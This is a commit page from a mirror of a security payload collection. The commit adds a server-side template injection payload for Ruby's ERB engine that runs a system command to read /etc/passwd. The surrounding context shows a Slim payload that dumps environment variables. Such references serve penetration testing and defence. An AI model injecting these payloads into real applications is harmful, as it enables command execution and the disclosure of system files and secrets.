mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-01 07:57:25 +00:00
Adding Execute code using SSTI for ERB engine.
This commit is contained in:
parent
04899355ad
commit
7f1fb32980
@ -97,6 +97,12 @@ Execute code using SSTI for Slim engine.
|
|||||||
#{ %x|env| }
|
#{ %x|env| }
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= system('cat /etc/passwd') %>
|
||||||
|
```
|
||||||
|
|
||||||
## Java
|
## Java
|
||||||
|
|
||||||
### Basic injection
|
### Basic injection
|
||||||
|
Loading…
Reference in New Issue
Block a user